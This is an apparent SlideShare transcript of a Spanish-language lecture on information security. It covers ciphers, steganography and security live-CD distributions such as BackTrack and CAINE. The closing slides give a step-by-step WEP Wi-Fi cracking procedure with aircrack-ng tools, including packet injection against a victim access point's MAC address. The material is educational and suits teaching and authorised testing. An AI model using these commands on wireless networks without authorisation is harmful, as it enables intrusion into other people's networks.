Seguridad informatica (live cd) 1.2
Upcoming SlideShare
Loading in...5
×
 

Seguridad informatica (live cd) 1.2

on

  • 1,418 views

Distribuciones Live CD de Seguridad Informática.

Distribuciones Live CD de Seguridad Informática.

Statistics

Views

Total Views
1,418
Views on SlideShare
1,414
Embed Views
4

Actions

Likes
0
Downloads
29
Comments
0

3 Embeds 4

http://paper.li 2
http://www.linkedin.com 1
https://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Adobe PDF

Usage Rights

CC Attribution License

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

Seguridad informatica (live cd) 1.2 Seguridad informatica (live cd) 1.2 Presentation Transcript

  • SEGURIDAD INFORMÁTICA Distribuciones Live-CD Prof. Manuel Mujica manuel@ubuntu.org.ve
  • CONTENIDO ¿Qué es seguridad de la información? ¿Por qué seguridad informática? Modelos de ataques Criptografía Esteganografía Distribuciones Live-CD Ejemplos
  • ¿Qué es Seguridad de la Información? Seguridad de información es mucho más que establecer“firewalls”, aplicar parches para corregir nuevas vulnerabilidades en el sistema de software, o guardar en la bóveda los “backups”.Seguridad de información es determinar qué requiere ser protegido y por qué, de qué debe ser protegido y cómo protegerlo.
  • ¿Qué es Seguridad de la Información?La seguridad de información se caracteriza por la preservación de:CONFIDENCIALIDAD : La información está protegida depersonas no autorizadas.INTEGRIDAD : La información está como se pretende, sinmodificaciones inapropiadas.DISPONIBILIDAD : Los usuarios tienen acceso a la informacióny a los activos asociados cuando lo requieran.
  • ¿Por qué seguridad informática? RSA, la División de Seguridad de EMC (NYSE: EMC), anunciólos resultados de la Encuesta mundial sobre seguridad delconsumidor en línea del año 2010: 92% realizó una transacciónbancaria en línea y el 80% realizó una compra en línea. Un reciente estudio de Federal Deposit Insurance Corporation(FDIC) indica que durante el último trimestre de 2009, losciberdelincuentes robaron más de 150 millones de dólares decuentas bancarias de pequeñas y medianas empresasnorteamericanas.
  • Modelos de AtaquesE R E R I I Intercepción Modificación E R E R E: Emisor I I R: Receptor I: Intruso Fabricación Interrupción
  • Criptografía Técnica para ocultar y así proteger información Técnica para ocultar y así proteger información mientras permanece en disco mientras permanece en disco o mientras está en tránsito o mientras está en tránsitoSubstitución: Cambia un carácter por uno o varios caracteres M U R C I E L A GO 0 1 2 3 4 5 6 7 8 9 Hola como estas H967 3909 5ST7S
  • CriptografíaSubstitución.Sustituir un elemento del alfabeto del texto-plano por uno que corres-ponde al alfabeto del texto-cifrado.El alfabeto latino, que consta de 29 letras: A, B, C, Ch, D, E, F, G, H, I,J, K, L, Ll, M, N, Ñ, O, P, Q, R, S, T, U, V, W, X, Y y Z Texto-plano: UNIVERSIDAD Texto-cifrado: XPLYHUVLGChG
  • CriptografíaTransposición (Permutación). Permuta los caracteres del texto plano. Texto-plano: ESTE ES UN MENSAJE DE PRUEBA! Texto-cifrado: EUAR SNJU TMEE EEDB ENEA SSP! E S T E E S U NM E N S A J E D E P R U E B A !
  • EsteganografíaEl término "esteganografía" viene del griego stegos, que signi-fica "cubierta", por lo que esteganografía significaría "escritu-ra oculta" o "escritura encubierta".Así pues, la esteganografía es el conjunto de técnicas que per-miten ocultar o camuflar la información.Nótese que la criptografía modifica los datos para que no seanlegibles, a diferencia de la esteganografía, que simplemente lostoma y los oculta entre otros datos.La esteganografía se utiliza para crear canales encubiertos(covert channels) y marcas de agua (watermarks) para protegerderechos de autor.
  • Esteganografía
  • Distribuciones Live-CD
  • nUbuntunUbuntu o Network Ubuntu es un proyecto para tomar ladistribución Ubuntu existente y reconvertirla en un LiveCD einstalación completa con las herramientas necesarias para realizarpruebas de penetración en servidores y redes.La distro incluye algunos de los programas de seguridad paraLinux más usados, tales como Ethereal, nmap, dSniff, yEttercap.Distribución GNU/Linux Fuente: http://www.nubuntu.org
  • CAINECAINE (Computer Aided INvestigative Environment) es unadistribución GNU/Linux de origen italiano. Creado como unproyecto de Ingeniería Forense.Proporciona: Fácil interoperabilidad durante todo el análisis (Preservación, Recolección, Análisis, Reportes). Amigable entorno gráfico. Ubuntu como sistema base. Generación semi-automática de reportes.
  • CAINEAlgunas herramientas incluidas: Grissom Analyzer Automated Image & Restore (AIR) Guymager Foremost and Scalpel Autopsy 2.20 and TSK 3.0 SFDumper Fundl Stegdetect OphcrackCAINE es Open Source Fuente: http://www.caine-live.net/
  • BackTrackBackTrack es una distribución GNU/Linux en formato Live-CDpensada y diseñada para la auditoría de seguridad y relacionadacon la seguridad informática en general.Se deriva de la unión de dos grandes distribuciones orientadas a laseguridad, el Auditor + WHAX.Sistema base Ubuntu.
  • BackTrackIncluye una larga lista de herramientas de seguridad listas parausar, entre las que destacan numerosos scanners de puertos yvulnerabilidades, archivos de exploits, sniffers, herramientasde análisis forense y herramientas para la auditoría Wireless.Fuente: http://www.backtrack-linux.org/
  • BackTrackLista de Herramientas: Recolección de Información (37) Dig, TCPtraceroute, Tctrace, Whoami. Mapeo de Redes (28) Hping, Nmap Identificación de Vulnerabilidades (65) GFI LanGuard, Nikto, SuperScan Penetración (12) OpenSSL-To-Open, Pirana Escalada de Privilegios (48) Etherape, EtterCap, Wireshark Mantenimiento de Acceso (15) Backdoors, CryptCat
  • BackTrackLista de Herramientas: Cubrimiento (1) Housekeeping Análisis de redes inalámbricas 802.11 WIFI (25): aircrack-ng, Airsnort Bluetooth (22): Btcrack, hstest VOIP & Análsis telefónico (7) SIPdump, Smap Ingeniería forence (13) Autopsy, DD_Rescue, Foremost, Rootkithunter Ingeniería Inversa (7) GDB GNU Debugger, GDB Console GUI Servicios (1) SNORT
  • Ejemplos: steghideAdjuntar adj.txt en cvr.jpg:#steghide embed -cf cvr.jpg -ef adj.txtExtraer datos adjuntos desde cvr.jpg:#steghide extract -sf cvr.jpg
  • Ejemplos: wireshark
  • Nikto
  • Nikto
  • Ejemplos: crack wep wifiTérminos:-------------BSSID (mac del router que da la señal)PWR (Poder de señal)CHN (Canal que se encuentra la red)ENCR (Es el tipo de contraseña que tiene la red)ESSID (Nombre de la red inalámbrica).
  • Ejemplos: crack wep wifiCaso 1: Red sin Filtro de MAC:Abrimos una Terminal (consola 1):1. Ponemos la tarjeta en modo monitor con airmon-ngairmon-ng start [nombre tarjeta inalámbrica] --> wlan0, wlan1,ath0,.Ejemplo:#airmon-ng start wlan0En modo monitor, la tarjeta quedara renombrada como: mon0 omon1
  • Ejemplos: crack wep wifiCaso 1: Red sin Filtro de MAC:2. Escaneamos las redes wireless con airodump-ngairodump-ng [nombre tarjeta inalámbrica] --> mon0, mon1…..Ejemplo:#airodump-ng mon0Verificamos el canal (CH) en el que está trabajando la red al cualatacaremos.Presionamos Ctrl + c para detener el escaneo.
  • Ejemplos: crack wep wifiCaso 1: Red sin Filtro de MAC:Abrimos otra Terminal (consola 2):1. Nos asociamos a la red inalámbrica con aireplay-ngaireplay-ng -1 0 -a [MAC AP Victima] [nombre tarjeta wifi]Ejemplo:#aireplay-ng -1 0 –a 11:22:33:44:55:66 mon02. Empezamos a inyectar paquetes a la red asociada con aireplay-ngaireplay-ng -3 -b [MAC AP Victima] [nombre tarjeta wifi]Ejemplo:#aireplay-ng -3 –b 11:22:33:44:55:66 mon0
  • Ejemplos: crack wep wifiCaso 1: Red sin Filtro de MAC:Abrimos otra Terminal (consola 3):1. Una vez capturado una gran cantidad de datos (Data) vamos acrackear la red inalámbrica con aircrack-ngaircrack-ng [filename]-01.capEjemplo:#aircrack-ng wep-01.cap
  • GRACIAS POR SU ATENCIÓN "Sólo hay un bien: el conocimiento. Sólo hay un mal: la ignorancia." Sócrates.
  • http://pide.wordpress.com CONTACTO: email: manuel@ubuntu.org.ve OpenPGP keys:7661B42E http://pgp.cs.uu.nl/ Twitter: @mmujica001 Ubuntu User #4728 Linux User #439689 Blogs: http://pide.wordpress.com http://www.ubuntu-ve.org http://creativecommons.org/licenses/by/3.0/deed.es